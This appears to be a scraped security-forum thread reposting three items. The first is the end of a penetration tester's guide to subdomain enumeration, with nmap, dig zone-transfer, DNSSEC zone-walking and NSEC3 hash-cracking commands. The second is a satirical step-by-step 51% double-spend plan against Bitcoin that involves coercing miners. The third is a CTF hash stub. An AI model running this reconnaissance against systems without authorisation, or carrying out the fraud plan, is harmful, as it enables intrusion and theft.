permutations/alterations using AltDNS 6. Finding Autonomous System (AS) Numbers will help us identify netblocks belonging to an organization which in-turn may have valid domains. Resolve the IP address of a given domain using dig or host There are tools to find ASN given an IP address — https://asn.cymru.com/cgi-bin/whois.cgi There are tools to find ASN given a domain name — http://bgp.he.net/ Finding AS Number using IP address The ASN numbers found can be used to find netblocks of the domain. There are Nmap scripts to achieve that — https://nmap.org/nsedoc/scripts/targets-asn.html $ nmap --script targets-asn --script-args targets-asn.asn=17012 > netblocks.txt Finding netblocks using AS numbers — NSE script 7. Zone transfer is a type of DNS transaction where a DNS server passes a copy of full or part of it’s zone file to another DNS server. If zone transfers are not securely configured, anyone can initiate a zone transfer against a nameserver and get a copy of the zone file. By design, zone file contains a lot of information about the zone and the hosts that reside in the zone. $ dig +multi AXFR @ns1.insecuredns.com insecuredns.com Successful zone transfer using DIG tool against a nameserver for a domain 8. Due to the way non-existent domains are handled in DNSSEC, it is possible to “walk” the DNSSEC zones and enumerate all the domains in that zone. You can learn more about this technique from here. For DNSSEC zones that use NSEC records, zone walking can be performed using tools like ldns-walk $ ldns-walk @ns1.insecuredns.com insecuredns.com Zone walking DNSSEC zone with NSEC records Some DNSSEC zones use NSEC3 records which uses hashed domain names to prevent attackers from gathering the plain text domain names. An attacker can collect all the sub-domain hashes and crack the hashes offline Tools like nsec3walker, nsec3map help us automate the collecting NSEC3 hashes and cracking the hashes. Once you install nsec3walker, you can use the following commands to enumerate sub-domains of NSEC3 protected zone # Collect NSEC3 hashes of a domain $ ./collect icann.org > icann.org.collect # Undo the hashing, expose the sub-domain information. $ ./unhash < icann.org.collect > icann.org.unhash # Listing only the sub-domain part from the unhashed data $ cat icann.org.unhash | grep "icann" | awk '{print $2;}' del.icann.org. access.icann.org. charts.icann.org. communications.icann.org. fellowship.icann.org. files.icann.org. forms.icann.org. mail.icann.org. maintenance.icann.org. new.icann.org. public.icann.org. research.icann.org. 9. There are projects that gather Internet wide scan data and make it available to researchers and the security community. The datasets published by this projects are a treasure trove of sub-domain information. Although finding sub-domains in this massive datasets is like finding a needle in the haystack, it is worth the effort. Forward DNS dataset is published as part of Project Sonar. This data is created by extracting domain names from a number of sources and then sending an ANY query for each domain. The data format is a gzip-compressed JSON file. We can parse the dataset to find sub-domains for a given domain. The dataset is massive though(20+GB compressed, 300+GB uncompressed) # Command to parse & extract sub-domains for a given domain $ curl -silent https://scans.io/data/rapid7/sonar.fdns_v2/20170417-fdns.json.gz | pigz -dc | grep “.icann.org” | jq Enumerating sub-domains using FDNS dataset Sub-domain enumeration techniques — A comparison We ran few of the discussed techniques against icann.org and compared the results. The bar chart below shows the number of unique, resolvable sub-domains each technique found for icann.org. Feel free to get in touch with us to know the methods we used to gather this information. Number of unique, resolvable sub-domains each technique found for icann.org Sub-domain enumeration — Reference We created a simple reference for sub-domain enumeration techniques, tools and sources. This reference is created using a Github gist, feel free to fork, customise it— https://gist.github.com/yamakira/2a36d3ae077558ac446e4a89143c69ab Quick reference for sub-domain enumeration References https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration https://blog.appsecco.com/open-source-intelligence-gathering-101-d2861d4429e3 https://www.databreaches.net/hackers-post-450k-credentials-apparently-pilfered-from-yahoo/ http://info.menandmice.com/blog/bid/73645/Take-your-DNSSEC-with-a-grain-of-salt https://www.peerlyst.com/posts/bsideslv-2017-breaking-ground-with-underflow-bsides-las-vegas Thank you for reading this article. If you enjoyed it please let us know by clicking that little clap icon below. Sursa: https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6
  13. Are you from the government? Do you feel threatened by Bitcoin? The answer is obviously no and there are more important things to do, but let’s assume you do and you’re China. How can you kill it? Everyone gossips how secure and unstoppable cryptocurrencies are, which kinda makes you sad because you like to be in control, right? Bitcoin is indeed way harder to ban than just arrest a couple of individuals and shutting down their server like what happened to Silk Road, E-Gold, Liberty Reserve, and pretty much anyone annoying the authorities. In cryptocurrencies there’s no central server to shut down: every single user runs one (full node) for security (that’s in perfect world, in practice most use a web wallet connected to popular cloud provider). But there are coordinators also known as miners or validators or witnesses that are chosen by some rule. In Bitcoin miners find hashes (computationally expensive and needs cheap electricity), and most of the miners are located in your country. Shutting down the miners would be the stupidest thing to do. Bitcoin doesn’t depend on miners for survival, it depends on them for security. So if you make miners go away, difficulty adjustment will kick in and soon miners in other countries will continue securing the network. Instead, to kill Bitcoin, you need to do one big nasty 51% attack. Step 1. Buy a lot of it. Find all big crypto exchanges around, register fully verified accounts, 10–40 on each exchange. So we have about 100 exchanges and 40 accounts on each. Great. Let’s buy $100M worth of Bitcoins. You’re the government, you can afford it for national security, can’t you? Bitcoin’s market cap at the moment of writing is $95B so that would be 0.1% — a fair enough leverage. Send all the money from exchanges to your own desktop wallets. That’s the hardest part: UX of crypto wallets suck so much there’s big chance you will just lose it. (partially joking) Step 2. Locate the 51% of miners. 71% according to https://www.buybitcoinworldwide.com/mining/china/ are somewhere in China. They try to be anonymous, but you are China, and you make people install spy apps on their phones https://thenextweb.com/asia/2017/07/25/chinas-forcing-its-citizens-to-install-a-terrifying-big-brother-app-on-their-phones-or-go-to-jail/ so that shouldn’t be a problem to figure out the largest ones. Hint: They feed on free electricity. So ask around. Here is a story about one from Ordos (not that far from Beijing): Photos: Inside one of the world’s largest bitcoin mines One of the world’s largest bitcoin mines is located in the SanShangLiang industrial park on the outskirts of the city…qz.com Step 3. A secret operation Now ask your secret law enforcement division to find as many miners as possible on day X. Since it is a law enforcement operation, your officers are allowed to point guns to miners’ heads. That will speed up their thinking process, in case they pretend they don’t know what Bitcoin is and how to do 51%. That’s how gov works when it needs to achieve something. And since you’re China, no need to bother trying to look liberal while doing that. Step 4. Double spending time! Make them do the following: they need to mine ~4,000 transactions ($25,000 each) from your desktop wallets in a single block and broadcast it to everyone. These 4,000 transactions will be sending money back to all the accounts you created in Step 1. Normally, exchanges require 6 blocks built on top (confirmations) to consider that transaction final. So now the rest of the network will try to build blocks on top of yours. While they are doing that, mine on top of the block before one you just mined. I.e. you take blockN, send everyone blockN+1 so they keep working on blockN+2 and blockN+3, but you instead focus on mining a different branch blockN+1B and blockN+2B. You have 51% so most likely you will mine faster than everyone else. Once outside miners get 6 confirmations of your block you need to request an exchange of your Bitcoins on all exchanges to something else. Litecoin, Ripple, Ethereum, whatever. They normally exchange automatically. Then you need to send all those altcoins to your desktop wallets again. After changing all BTC to altcoins and requesting altcoins withdrawal, release the other “secret” branch that basically cancels the block with 4,000 transactions you mined. It’s called reorganization: now everyone in the network must accept your chain as the main one, and forget about all the other transactions that are now “orphaned”. Step 5. Watch the coinmarketcap going to 0 This means $100M worth of Bitcoin (which exchanges no longer have) were just exchanged to $100M worth of altcoins, which you do have. Congrats on your double-spend operation, you now have $200M worth of cryptocurrencies! The price of them is going to 0, but that’s what the original purpose was anyway. You can repeat the process again, but you don’t need to. A single attack of this size would destroy faith in cryptocurrencies for next few years. There will be no backlash from other governments — Bitcoin is outside of any jurisdiction or law practice. So you can do it both privately or publicly. Recap It’s a rage post, but I’m not against Bitcoin. I’m against stupidity we have right now. We need to become paranoid again and get our threat model in place. What the actual fuck are you busy with right now? Smart contracts? Identity on blockchain? Exchanging shittokens to shittokens in decentralized fashion? ICOs? These things are completely irrelevant compared to censorship resistance, one and only important quality of a blockchain. The rest of your shit can run on $5 server 1000x times more efficiently. If you don’t need censorship resistance for your task: leave the blockchains alone and get busy with something else! The attack is way easier against Ethereum (step 1. get Vitalik), and the rest of cryptocurrencies you can 51% attack by just buying some ASICs for the cost of one helicopter. So if you act, better attack Bitcoin, and see the domino effect. P.S. If you’re not China and you don’t have James Bond-level spies in China who can hijack the miners for you, doing 51% against Bitcoin on your own is much tricker. So better try to convince China to do it for you. Sursa: https://medium.com/@homakov/how-to-destroy-bitcoin-with-51-pocked-guide-for-governments-83d9bdf2ef6b
  14. [Easy] The big fat panda

    MD5(the_big_fat_panda.jpg) = 409302F21EA7DCFE2ED9BBF3C810081C